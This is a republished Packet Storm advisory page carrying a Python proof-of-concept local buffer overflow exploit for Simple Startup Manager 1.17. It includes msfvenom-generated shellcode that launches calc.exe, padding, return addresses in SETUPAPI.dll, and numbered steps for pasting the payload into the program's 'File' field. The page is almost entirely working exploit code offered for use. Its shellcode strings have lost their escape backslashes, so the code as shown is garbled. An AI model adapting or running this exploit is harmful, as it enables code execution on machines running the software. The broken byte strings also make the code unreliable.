Exploit/Advisories

Published on July 18th, 2020 📆 | 5132 Views ⚑

0

Simple Startup Manager 1.17 Buffer Overflow ≈ Packet Storm


Text to Speech

# Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)
# Exploit Author: PovlTekstTV
# Date: 2020-07-15
# Vulnerable Software: Simple Startup Manager
# Software Link Download: http://www.ashkon.com/download/startup-manager.exe
# Version: 1.17
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit)
# DEP and ASLR Disabled on system
# Space for shellcode: 264

#!/usr/bin/python
# Two sets of instructions are needed:
# 1. JMP EDI
# 2. JMP EBX
# I found these in the OS-module: SETUPAPI.dll, which is usually protected using ASLR
# The exploit will properly not work unless changed/bruteforced.

# It is also possible to overwrite the SEH-handler with 600+ bytes,
# however I did not find any POP, POP, RETs.

# Walkthrough:
# 1.- Run the python script, it will create a new file "exploit.txt"
# 2.- Copy the content of the new file 'exploit.txt' to clipboard
# 3.- Turn off DEP for startup-manger.exe
# 4.- Open 'startup-manger.exe'
# 5.- Click 'New' or go to 'File' and click 'New'
# 6.- Paste content from clipboard into 'File' parameter
# 7.- Click on 'OK'
# 9.- Calc.exe runs.





#Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c
#msfvenom -p windows/exec cmd=calc.exe -f c -b "x00x0ax0cx0dx3ax5c"
shellcode = ("xdbxd0xd9x74x24xf4xbexcbxe3xc2xa5x5ax33xc9xb1"
"x31x83xc2x04x31x72x14x03x72xdfx01x37x59x37x47"
"xb8xa2xc7x28x30x47xf6x68x26x03xa8x58x2cx41x44"
"x12x60x72xdfx56xadx75x68xdcx8bxb8x69x4dxefxdb"
"xe9x8cx3cx3cxd0x5ex31x3dx15x82xb8x6fxcexc8x6f"
"x80x7bx84xb3x2bx37x08xb4xc8x8fx2bx95x5ex84x75"
"x35x60x49x0ex7cx7ax8ex2bx36xf1x64xc7xc9xd3xb5"
"x28x65x1ax7axdbx77x5axbcx04x02x92xbfxb9x15x61"
"xc2x65x93x72x64xedx03x5fx95x22xd5x14x99x8fx91"
"x73xbdx0ex75x08xb9x9bx78xdfx48xdfx5exfbx11xbb"
"xffx5axffx6axffxbdxa0xd3xa5xb6x4cx07xd4x94x1a"
"xd6x6axa3x68xd8x74xacxdcxb1x45x27xb3xc6x59xe2"
"xf0x39x10xafx50xd2xfdx25xe1xbfxfdx93x25xc6x7d"
"x16xd5x3dx9dx53xd0x7ax19x8fxa8x13xccxafx1fx13"
"xc5xd3xfex87x85x3dx65x20x2fx42")

payload = shellcode
payload += ("A"*(268-len(payload)-4))
payload += ("xe4xa9x4ex76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll]
payload += ("x5fxbcx4ex76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll]

#Write payload to file
file = open("exploit.txt" , 'w')
file.write(payload)
file.close()

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑